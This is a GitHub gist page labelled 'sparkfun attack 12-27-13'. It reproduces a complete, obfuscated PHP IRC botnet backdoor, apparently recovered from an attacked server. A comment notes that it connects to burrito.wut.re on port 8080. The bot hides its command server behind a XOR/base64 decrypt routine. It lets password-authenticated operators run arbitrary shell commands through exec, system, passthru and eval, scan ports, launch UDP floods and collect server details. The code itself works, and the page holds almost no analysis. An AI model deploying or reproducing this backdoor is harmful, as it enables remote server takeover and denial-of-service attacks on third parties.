Last active
December 30, 2019 05:33
-
-
Save toddtreece/8152233 to your computer and use it in GitHub Desktop.
sparkfun attack 12-27-13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php set_time_limit(0); error_reporting(0); class FZjJrBjJJZfjFnzFf { | |
| var $BvNfVZJNBNjVNvz = array("JFJBfVJnRRzvbZzJ"=>"dXdkZ31kej5geHk7e30=", | |
| "zvvF"=>"8080", | |
| "nVnBV"=>"scary", | |
| "zjnNFn"=>"13", | |
| "HhLxP"=>"#ngrz", | |
| "vBf"=>"scan", | |
| "FzvzFJrrj"=>"bf4b3ba0692b4378406f3df1df1e326a", | |
| "NrVzbznZJJ"=>".", | |
| "rzZvbbnfbjf"=>"90c83c5174ae2098c64393e576a10048"); | |
| var $zRFfVVnrfzzjBRBVBr = array(); | |
| var $key = array("key_a"=>"WbvUtpu0WMM5i8mMDzlP5Thyy","key_b"=>"gL5Ax7nyt7SIrIv3kqbiDNM2Z","key_c"=>"rXJzm7FY26lZjKigsRx1drbut"); | |
| function UQiEeyUmuAIqYuyu() { | |
| $HpdTpD = '[abcdefghijklm)nopqrstuvwxyz_ABCDEFGHIJKLM(NOPQRSTUVWXYZ-0123456789]'; | |
| $tHXhLLT = strlen($HpdTpD); | |
| for($T=0;$T<$this->BvNfVZJNBNjVNvz['zjnNFn'];$T++) { | |
| $umA .= $HpdTpD[rand(0,$tHXhLLT-1)]; | |
| } | |
| $this->QUqueMM("NICK ".$umA.""); | |
| } | |
| function uIQyaqIqMy($Xx,$tLx) | |
| { | |
| $this->QUqueMM("NOTICE $Xx :$tLx"); | |
| } | |
| function QymAyMmuEAQM($lhPH) | |
| { | |
| if(isset($this->zRFfVVnrfzzjBRBVBr[$lhPH])) | |
| return 1; | |
| else | |
| return 0; | |
| } | |
| function qAaQuQMYYauqaQemYa($lhPH,$pDHttXtPdT,$mQeQ) { | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002UdpFlood Gestart!\002]"); | |
| $PTPtdPLXp = ""; | |
| for($T=0;$T<$pDHttXtPdT;$T++) { $PTPtdPLXp .= chr(mt_rand(1,256)); } | |
| $ThpHp = time(); | |
| $T = 0; | |
| while(time()-$ThpHp < $mQeQ) { | |
| $Np=fsockopen("udp://".$lhPH,mt_rand(0,6000),$e,$s,5); | |
| fwrite($Np,$PTPtdPLXp); | |
| fclose($Np); | |
| $T++; | |
| } | |
| $zGP = $T * $pDHttXtPdT; | |
| $zGP = $zGP / 1048576; | |
| $hVC = $zGP / $mQeQ; | |
| $hVC = round($hVC); | |
| $zGP = round($zGP); | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002UdpFlood Afgerond!\002]: $zGP MB verzonden / gemiddelde: $hVC MB/s "); | |
| } | |
| function mUMAIemiuqi($Xx,$tLx) | |
| { | |
| $this->QUqueMM("PRIVMSG $Xx :$tLx"); | |
| } | |
| function QaEUaI($HhLxP,$vBf=NULL) | |
| { | |
| $this->QUqueMM("JOIN $HhLxP $vBf"); | |
| } | |
| function eaiAYmuqM($lhPH) | |
| { | |
| $this->zRFfVVnrfzzjBRBVBr[$lhPH] = true; | |
| } | |
| function MMeIaQyAaAAQmu() | |
| { | |
| while(!feof($this->wwgGsCWsk)) | |
| { | |
| $this->auuyy = trim(fgets($this->wwgGsCWsk,512)); | |
| $bnfznjJFbrRVj = explode(" ",$this->auuyy); | |
| if(substr($this->auuyy,0,6)=="PING :") | |
| { | |
| $this->QUqueMM("PONG :".substr($this->auuyy,6)); | |
| } | |
| if(isset($bnfznjJFbrRVj[1]) && $bnfznjJFbrRVj[1] =="004") | |
| { | |
| $this->QUqueMM("JOIN ".$this->BvNfVZJNBNjVNvz['HhLxP']." ".$this->BvNfVZJNBNjVNvz['vBf'].""); | |
| $this->QaEUaI($this->BvNfVZJNBNjVNvz['HhLxP'],$this->BvNfVZJNBNjVNvz['vBf']); | |
| $this->eImyUaqEeYMaUaaYUyM(); | |
| } | |
| if(isset($bnfznjJFbrRVj[1]) && $bnfznjJFbrRVj[1]=="433") | |
| { | |
| $this->UQiEeyUmuAIqYuyu(); | |
| } | |
| if($this->auuyy != $FnF_PPl) | |
| { | |
| $RvJbVrNjRjfVNv = array(); | |
| $oKs = substr(strstr($this->auuyy," :"),2); | |
| $KCgs = explode(" ",$oKs); | |
| $SoCkc = explode("!",$bnfznjJFbrRVj[0]); | |
| $WkSCsk = explode("@",$SoCkc[1]); | |
| $WkSCsk = $WkSCsk[1]; | |
| $SoCkc = substr($SoCkc[0],1); | |
| $sgcwGck = $bnfznjJFbrRVj[0]; | |
| if($KCgs[0]==$this->SoCkc) | |
| { | |
| for($T=0;$T<count($KCgs);$T++) | |
| $RvJbVrNjRjfVNv[$T] = $KCgs[$T+1]; | |
| } | |
| else | |
| { | |
| for($T=0;$T<count($KCgs);$T++) | |
| $RvJbVrNjRjfVNv[$T] = $KCgs[$T]; | |
| } | |
| if(count($bnfznjJFbrRVj)>2) | |
| { | |
| switch($bnfznjJFbrRVj[1]) | |
| { | |
| case "QUIT": | |
| if($this->QymAyMmuEAQM($sgcwGck)) | |
| { | |
| $this->QUMaQayu($sgcwGck); | |
| } | |
| break; | |
| case "PART": | |
| if($this->QymAyMmuEAQM($sgcwGck)) | |
| { | |
| $this->QUMaQayu($sgcwGck); | |
| } | |
| break; | |
| case "PRIVMSG": | |
| if(!$this->QymAyMmuEAQM($sgcwGck) && (md5($WkSCsk) == $this->BvNfVZJNBNjVNvz['rzZvbbnfbjf'] || $this->BvNfVZJNBNjVNvz['rzZvbbnfbjf'] == "*")) | |
| { | |
| if(substr($RvJbVrNjRjfVNv[0],0,1)==$this->BvNfVZJNBNjVNvz['NrVzbznZJJ']) | |
| { | |
| switch(substr($RvJbVrNjRjfVNv[0],1)) | |
| { | |
| case "user": | |
| if(md5($RvJbVrNjRjfVNv[1])==$this->BvNfVZJNBNjVNvz['FzvzFJrrj']) | |
| { | |
| $this->eaiAYmuqM($sgcwGck); | |
| } | |
| else | |
| { | |
| $this->uIQyaqIqMy($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002Auth\002]: Fout password $SoCkc idioot!!"); | |
| } | |
| break; | |
| } | |
| } | |
| } | |
| elseif($this->QymAyMmuEAQM($sgcwGck)) | |
| { | |
| if(substr($RvJbVrNjRjfVNv[0],0,1)==$this->BvNfVZJNBNjVNvz['NrVzbznZJJ']) | |
| { | |
| switch(substr($RvJbVrNjRjfVNv[0],1)) | |
| { | |
| case "exec": | |
| $CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
| $kWkGgkwkcGkck = exec($CowSSSGkwgkG); | |
| $oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
| for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
| if($oWkOSwOKWgCokk[$T]!=NULL) | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
| break; | |
| case "sexec": | |
| $CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
| $kWkGgkwkcGkck = shell_exec($CowSSSGkwgkG); | |
| $oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
| for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
| if($oWkOSwOKWgCokk[$T]!=NULL) | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
| break; | |
| case "eval": | |
| $eval = eval(substr(strstr($oKs,$RvJbVrNjRjfVNv[1]),strlen($RvJbVrNjRjfVNv[1]))); | |
| break; | |
| case "system": | |
| $CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
| $kWkGgkwkcGkck = system($CowSSSGkwgkG); | |
| $oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
| for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
| if($oWkOSwOKWgCokk[$T]!=NULL) | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
| break; | |
| case "dns": | |
| if(isset($RvJbVrNjRjfVNv[1])) | |
| { | |
| $Os = explode(".",$RvJbVrNjRjfVNv[1]); | |
| if(count($Os)==4 && is_numeric($Os[0]) && is_numeric($Os[1]) && is_numeric($Os[2]) && is_numeric($Os[3])) | |
| { | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002dns\002]: ".$RvJbVrNjRjfVNv[1]." => ".gethostbyaddr($RvJbVrNjRjfVNv[1])); | |
| } | |
| else | |
| { | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002dns\002]: ".$RvJbVrNjRjfVNv[1]." => ".gethostbyname($RvJbVrNjRjfVNv[1])); | |
| } | |
| } | |
| break; | |
| case "logout": | |
| $this->QUMaQayu($sgcwGck); | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002Auth\002]\00314 Je bent nu uitgelogt $SoCkc"); | |
| break; | |
| case "rndnick": | |
| $this->UQiEeyUmuAIqYuyu(); | |
| break; | |
| case "info": | |
| $this->eImyUaqEeYMaUaaYUyM(); | |
| break; | |
| case "raw": | |
| $this->QUqueMM(strstr($oKs,$RvJbVrNjRjfVNv[1])); | |
| break; | |
| case "restart": | |
| $this->QUqueMM("QUIT :gerestart door $SoCkc"); | |
| fclose($this->wwgGsCWsk); | |
| $this->QmQIYIUuumeYu(); | |
| break; | |
| case "die": | |
| $this->QUqueMM("QUIT :die command from $SoCkc"); | |
| fclose($this->wwgGsCWsk); | |
| exit; | |
| case "passthru": | |
| $CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
| $kWkGgkwkcGkck = passthru($CowSSSGkwgkG); | |
| $oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
| for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
| if($oWkOSwOKWgCokk[$T]!=NULL) | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
| break; | |
| case "pscan": | |
| if(count($RvJbVrNjRjfVNv) > 2) | |
| { | |
| if(fsockopen($RvJbVrNjRjfVNv[1],$RvJbVrNjRjfVNv[2],$e,$s,15)) | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002pscan\002]: ".$RvJbVrNjRjfVNv[1].":".$RvJbVrNjRjfVNv[2]." is \2open\2"); | |
| else | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002pscan\002]: ".$RvJbVrNjRjfVNv[1].":".$RvJbVrNjRjfVNv[2]." is \2closed\2"); | |
| } | |
| break; | |
| case "udpflood": | |
| if(count($RvJbVrNjRjfVNv)>3) | |
| { | |
| $this->qAaQuQMYYauqaQemYa($RvJbVrNjRjfVNv[1],$RvJbVrNjRjfVNv[2],$RvJbVrNjRjfVNv[3]); | |
| } | |
| break; | |
| } | |
| } | |
| } | |
| break; | |
| } | |
| } | |
| } | |
| $FnF_PPl = $this->auuyy; | |
| } | |
| $this->QmQIYIUuumeYu(); | |
| } | |
| function QUqueMM($tLx) | |
| { | |
| fwrite($this->wwgGsCWsk,"$tLx\r\n"); | |
| } | |
| function QMeuUiMqMmqMaeeYY() { | |
| $HpdTpD = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; | |
| $tHXhLLT = strlen($HpdTpD); | |
| for($T=0;$T<6;$T++) { | |
| $umA .= $HpdTpD[rand(0,$tHXhLLT-1)]; | |
| } | |
| if(php_uname() == "") { $dHDdDxPL = "---"; } else { $dHDdDxPL = php_uname(); } | |
| $this->QUqueMM("USER ".$umA."-go 127.0.0.1 localhost :".$dHDdDxPL.""); | |
| } | |
| function QmQIYIUuumeYu() | |
| { | |
| if(!($this->wwgGsCWsk = fsockopen(decrypt($this->BvNfVZJNBNjVNvz['JFJBfVJnRRzvbZzJ'],$this->key['key_a']),$this->BvNfVZJNBNjVNvz['zvvF'],$e,$s,30))) | |
| $this->QmQIYIUuumeYu(); | |
| $this->QMeuUiMqMmqMaeeYY(); | |
| if(strlen($this->BvNfVZJNBNjVNvz['nVnBV'])>0) | |
| $this->QUqueMM("PASS ".$this->BvNfVZJNBNjVNvz['nVnBV']); | |
| $this->UQiEeyUmuAIqYuyu(); | |
| $this->MMeIaQyAaAAQmu(); | |
| } | |
| function QUMaQayu($lhPH) | |
| { | |
| unset($this->zRFfVVnrfzzjBRBVBr[$lhPH]); | |
| } | |
| function eImyUaqEeYMaUaaYUyM() { | |
| if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $dxdxdThxhxD = "\0034ON\003"; } else { $dxdxdThxhxD = "\0039OFF\003"; } | |
| $dHDdDxPL = php_uname(); | |
| if($dHDdDxPL == "") { $nVWKPl = "\00315---\003"; } else { $nVWKPl = "\00315".$dHDdDxPL."\003"; } | |
| $Nfgw = "\00315http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\003"; | |
| $hXOOO = getcwd().""; | |
| $hscO = "\00315".$hXOOO."\003"; | |
| $WsGsgKcSKO = fileperms("$hXOOO"); | |
| if (($WsGsgKcSKO & 0xC000) == 0xC000) { $WOwwCosOckk = 's'; | |
| } elseif (($WsGsgKcSKO & 0xA000) == 0xA000) { $WOwwCosOckk = 'l'; | |
| } elseif (($WsGsgKcSKO & 0x8000) == 0x8000) { $WOwwCosOckk = '-'; | |
| } elseif (($WsGsgKcSKO & 0x6000) == 0x6000) { $WOwwCosOckk = 'b'; | |
| } elseif (($WsGsgKcSKO & 0x4000) == 0x4000) { $WOwwCosOckk = 'd'; | |
| } elseif (($WsGsgKcSKO & 0x2000) == 0x2000) { $WOwwCosOckk = 'c'; | |
| } elseif (($WsGsgKcSKO & 0x1000) == 0x1000) { $WOwwCosOckk = 'p'; | |
| } else { $WOwwCosOckk = 'u'; } | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0100) ? 'r' : '-'); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0080) ? 'w' : '-'); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0040) ? (($WsGsgKcSKO & 0x0800) ? 's' : 'x' ) : (($WsGsgKcSKO & 0x0800) ? 'S' : '-')); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0020) ? 'r' : '-'); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0010) ? 'w' : '-'); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0008) ? (($WsGsgKcSKO & 0x0400) ? 's' : 'x' ) : (($WsGsgKcSKO & 0x0400) ? 'S' : '-')); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0004) ? 'r' : '-'); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0002) ? 'w' : '-'); | |
| $WOwwCosOckk .= (($WsGsgKcSKO & 0x0001) ? (($WsGsgKcSKO & 0x0200) ? 't' : 'x' ) : (($WsGsgKcSKO & 0x0200) ? 'T' : '-')); | |
| $jflP = "\00315".$WOwwCosOckk."\003"; | |
| $this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"\00314[SAFE:\003\002 $dxdxdThxhxD\002\00314]\00315 $Nfgw \00314[pwd:]\00315 $hscO \00314(\003$jflP\00314) [uname:]\00315 $nVWKPl"); | |
| } | |
| } | |
| function decrypt($text, $key = '') { | |
| if ($key == '') { return $text; } $text = base64_decode($text); | |
| $key = str_replace(' ', '', $key); if (strlen($key) < 8) { exit('key error'); } | |
| $key_len = strlen($key); if ($key_len > 32) { $key_len = 32; } | |
| $key = substr($key, 0, $key_len); $text_len = strlen($text); | |
| $lomask = str_repeat("\x1f", $text_len); $himask = str_repeat("\xe0", $text_len); | |
| $k = str_pad("", $text_len, $key); $text = (($text ^ $k) & $lomask) | ($text & $himask); | |
| return $text; | |
| } | |
| $GskCscoG = new FZjJrBjJJZfjFnzFf; | |
| $GskCscoG->QmQIYIUuumeYu(); ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
i think this is trying to connect to burrito.wut.re port 8080